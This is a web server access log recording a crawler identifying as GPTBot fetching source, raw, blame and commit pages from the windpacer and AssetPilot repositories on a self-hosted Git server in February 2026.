-[17/Feb/2026:14:52:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 18933] [Gzip 14.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:52:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 12519] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument" -[17/Feb/2026:14:52:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 11765] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument" -[17/Feb/2026:14:52:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10895] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject" -[17/Feb/2026:14:52:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10894] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject" -[17/Feb/2026:14:52:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10895] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject" -[17/Feb/2026:14:52:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9918] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main.cpp" -[17/Feb/2026:14:52:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10898] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject" -[17/Feb/2026:14:52:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main.cpp" -[17/Feb/2026:14:52:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9897] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main.cpp" -[17/Feb/2026:14:52:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main.cpp" -[17/Feb/2026:14:52:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main.cpp" -[17/Feb/2026:14:52:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 2167] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:14:52:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 887] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:14:52:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main" -[17/Feb/2026:14:52:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49518] [Gzip 26.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main" -[17/Feb/2026:14:52:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main" -[17/Feb/2026:14:52:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49517] [Gzip 26.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main" -[17/Feb/2026:14:52:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9913] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main" -[17/Feb/2026:14:52:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main" -[17/Feb/2026:14:52:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49521] [Gzip 26.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main" -[17/Feb/2026:14:52:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main" -[17/Feb/2026:14:52:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main" -[17/Feb/2026:14:52:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9921] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main.cpp" -[17/Feb/2026:14:52:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10896] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject" -[17/Feb/2026:14:52:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9910] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main" -[17/Feb/2026:14:52:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49519] [Gzip 26.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main" -[17/Feb/2026:14:52:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10872] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/main" -[17/Feb/2026:14:52:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main.cpp" -[17/Feb/2026:14:52:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main.cpp" -[17/Feb/2026:14:52:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/main" -[17/Feb/2026:14:52:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10895] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject" -[17/Feb/2026:14:52:46 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest" -[17/Feb/2026:14:52:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer?tab=following" [Client 74.7.227.38] [Length 6371] [Gzip 2.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer" -[17/Feb/2026:14:52:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%EB%8D%B0%EC%9D%B4%ED%84%B0%EB%B2%A0%EC%9D%B4%EC%8A%A4%20%ED%8A%B8%EB%A6%AC%EA%B1%B0%20%EC%A0%81%EC%9A%A9.md" [Client 74.7.227.38] [Length 13798] [Gzip 2.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" -[17/Feb/2026:14:52:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9913] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main" -[17/Feb/2026:14:52:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main" -[17/Feb/2026:14:52:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49518] [Gzip 26.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main" -[17/Feb/2026:14:52:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main" -[17/Feb/2026:14:52:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9890] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main" -[17/Feb/2026:14:52:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49490] [Gzip 26.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main" -[17/Feb/2026:14:52:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11354] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm" -[17/Feb/2026:14:52:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main" -[17/Feb/2026:14:52:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9910] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main" -[17/Feb/2026:14:52:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49519] [Gzip 26.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main" -[17/Feb/2026:14:52:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%EB%8D%B0%EC%9D%B4%ED%84%B0%EB%B2%A0%EC%9D%B4%EC%8A%A4%20%ED%8A%B8%EB%A6%AC%EA%B1%B0%20%EC%A0%81%EC%9A%A9.md" [Client 74.7.227.38] [Length 4132] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%EB%8D%B0%EC%9D%B4%ED%84%B0%EB%B2%A0%EC%9D%B4%EC%8A%A4%20%ED%8A%B8%EB%A6%AC%EA%B1%B0%20%EC%A0%81%EC%9A%A9.md" -[17/Feb/2026:14:52:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11355] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm" -[17/Feb/2026:14:52:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:14:52:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14854] [Gzip 9.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:14:52:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14856] [Gzip 9.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:14:52:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 